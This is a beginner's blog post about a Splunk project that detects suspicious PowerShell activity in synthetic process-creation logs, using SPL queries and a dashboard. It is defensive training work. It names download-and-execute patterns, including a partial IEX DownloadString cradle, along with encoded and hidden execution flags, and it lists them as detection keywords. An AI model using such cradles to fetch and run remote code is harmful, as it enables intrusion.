Threat Hunting in Splunk: Detecting Suspicious PowerShell Activity

Muhammad Bilal AkhtarMuhammad Bilal Akhtar
2 min read

As part of my SOC Analyst learning journey, I’ve built my second real-world Splunk project — this time focused on detecting malicious PowerShell commands that are commonly used in cyber attacks.

Objective

Simulate and detect realistic attacker behavior using:

  • Encoded PowerShell commands

  • Silent execution (-Hidden, -NoP, -Bypass)

  • Command downloads using IEX, Invoke-WebRequest, and more

Dataset Used

Since real attacks don’t show up in regular Windows logs, I used a custom-built .csv file of synthetic but realistic PowerShell logs.

Each log simulates Windows Event ID 4688 (Process Creation), including fields like:

  • _time

  • User

  • Parent_Process_Name

  • New_Process_Name

  • Command_Line

These logs included both benign and malicious PowerShell executions.

Phase 1: Explore the Logs

I started by simply displaying the data in a clean table to understand its structure:

splCopyEditindex=* source="suspicious_powershell_logs.csv"
| table User Command_Line EventCode Parent_Process_Name _time
| sort -_time

This helped me recognize dangerous patterns such as:

  • powershell.exe -EncodedCommand ...

  • IEX (New-Object Net.WebClient).DownloadString(...)

  • PowerShell launched from winword.exe

Phase 2: Suspicious Tagging

I used conditional logic to label each log as suspicious or not using the eval command:

splCopyEditindex=* source="suspicious_powershell_logs.csv"
| eval is_suspicious=if(
    like(Command_Line, "%EncodedCommand%") OR 
    like(Command_Line, "%IEX%") OR 
    like(Command_Line, "%DownloadString%") OR 
    like(Command_Line, "%Invoke-WebRequest%") OR 
    like(Parent_Process_Name, "%winword.exe%"),
    "true", 
    "false"
)
| table _time, User, Parent_Process_Name, Command_Line, is_suspicious
| sort -_time

This allowed me to track and filter suspicious behavior across all logs.

Phase 3: Visual Dashboard Panels

I then created a dashboard with multiple panels to visualize attack patterns.

🟦 Panel 1: Timechart of PowerShell Executions

splCopyEditindex=* source="suspicious_powershell_logs.csv" New_Process_Name="powershell.exe"
| timechart span=1h count as PowerShell_Executions

This shows the frequency of PowerShell executions over time — helping spot attack spikes.

Coming Next:

  • Top parent processes panel

  • Table of suspicious commands

  • Bar chart of most affected users

  • Alert when suspicious commands appear

What I Learned

  • How attackers hide PowerShell usage

  • How to tag suspicious logs using eval

  • How to make visual dashboards for faster triage

  • How to think like a SOC Analyst — not just write queries

Why This Project Matters

  • Real companies track PowerShell abuse like this

  • It maps to MITRE ATT&CK T1059.001 (PowerShell Execution)

POWERSHELL LOG DETECTION DASHBOARD

Thanks for reading, hope you find this article helpful. if you have any question, any advice or any kind of suggestion feel free to message me on LinkedIn: Bilal

0
Subscribe to my newsletter

Read articles from Muhammad Bilal Akhtar directly inside your inbox. Subscribe to the newsletter, and don't miss out.

PowershellLogsanalysis#cybersecuritycybersecuritylearningLearning Journey#learning-in-publicSOC AnalystSecuritySplunk

Written by

Muhammad Bilal Akhtar
Muhammad Bilal Akhtar